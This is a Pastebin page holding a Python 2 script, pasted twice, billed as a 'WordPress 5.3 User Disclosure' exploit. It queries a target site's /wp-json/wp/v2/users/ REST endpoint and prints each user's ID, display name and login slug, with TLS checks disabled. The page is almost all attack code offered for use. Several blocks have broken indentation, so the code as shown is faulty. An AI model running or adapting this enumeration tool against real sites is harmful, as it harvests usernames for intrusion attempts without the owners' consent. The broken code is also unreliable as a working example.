API tools faq
paste
Advertisement
RedBirdTeam

Exploit Wordpress 5.3 - User Disclosure

RedBirdTeam
Nov 29th, 2019
1,338
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.49 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title : Wordpress 5.3 - User Disclosure
  2. # Author: SajjadBnd
  3. # Date: 2019-11-17
  4. # Software Link: https://wordpress.org/download/
  5. # version : wp < 5.3
  6. # tested on : Ubunutu 18.04 / python 2.7
  7. # CVE: N/A
  8.  
  9.  
  10. #!/usr/bin/python
  11. # -*- coding: utf-8 -*-
  12. #
  13.  
  14.  
  15. import requests
  16. import os
  17. import re
  18. import json
  19. import sys
  20. import urllib3
  21.  
  22. def clear():
  23.     linux = 'clear'
  24.     windows = 'cls'
  25.     os.system([linux, windows][os.name == 'nt'])
  26. def Banner():
  27.         print('''
  28. - Wordpress < 5.3 - User Enumeration
  29. - SajjadBnd
  30. ''')
  31. def Desc():
  32.     url = raw_input('[!] Url >> ')
  33.     vuln = url + "/wp-json/wp/v2/users/"
  34.     while True:
  35.         try:
  36.             r = requests.get(vuln,verify=False)
  37.             content = json.loads(r.text)
  38.             data(content)
  39.         except requests.exceptions.MissingSchema:
  40.         vuln = "http://" + vuln
  41. def data(content):
  42.     for x in content:
  43.     name = x["name"].encode('UTF-8')
  44.     print("======================")
  45.     print("[+] ID : " + str(x["id"]))
  46.     print("[+] Name : " + name)
  47.     print("[+] User : " + x["slug"])
  48.     sys.exit(1)
  49. if __name__ == '__main__':
  50.     urllib3.disable_warnings()
  51.     reload(sys)
  52.     sys.setdefaultencoding('UTF8')
  53.     clear()
  54.     Banner()
  55.     Desc()
  56.  
  57. wpuser.txt
  58.  
  59. #!/usr/bin/python
  60. # -*- coding: utf-8 -*-
  61. #
  62. # Exploit Title : Wordpress < 5.3 - User Disclosure
  63. # Exploit Author: SajjadBnd
  64. # email : [email protected]
  65. # Software Link: https://wordpress.org/download/
  66. # version : wp < 5.3
  67. # tested on : Ubunutu 18.04 / python 2.7
  68.  
  69. import requests
  70. import os
  71. import re
  72. import json
  73. import sys
  74. import urllib3
  75.  
  76. def clear():
  77.     linux = 'clear'
  78.     windows = 'cls'
  79.     os.system([linux, windows][os.name == 'nt'])
  80.  
  81. def Banner():
  82.         print('''
  83. - Wordpress < 5.3 - User Enumeration
  84. - SajjadBnd
  85. ''')
  86.  
  87. def Desc():
  88.     url = raw_input('[!] Url >> ')
  89.     vuln = url + "/wp-json/wp/v2/users/"
  90.     while True:
  91.         try:
  92.             r = requests.get(vuln,verify=False)
  93.             content = json.loads(r.text)
  94.             data(content)
  95.         except requests.exceptions.MissingSchema:
  96.         vuln = "http://" + vuln
  97.  
  98. def data(content):
  99.     for x in content:
  100.     name = x["name"].encode('UTF-8')
  101.     print("======================")
  102.     print("[+] ID : " + str(x["id"]))
  103.     print("[+] Name : " + name)
  104.     print("[+] User : " + x["slug"])
  105.     sys.exit(1)
  106. if __name__ == '__main__':
  107.     urllib3.disable_warnings()
  108.     reload(sys)
  109.     sys.setdefaultencoding('UTF8')
  110.     clear()
  111.     Banner()
  112.     Desc()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!